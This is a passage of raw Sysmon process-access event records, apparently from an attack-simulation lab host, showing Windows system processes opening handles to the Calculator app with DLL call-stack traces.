Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361895Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361894Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361893Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361892Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361891Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361890Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361889Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361888Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361887Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361886Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361885Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361884Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361883Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361882Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361881Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361880Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361879Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361878Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361877Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361876Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361875Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361874Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 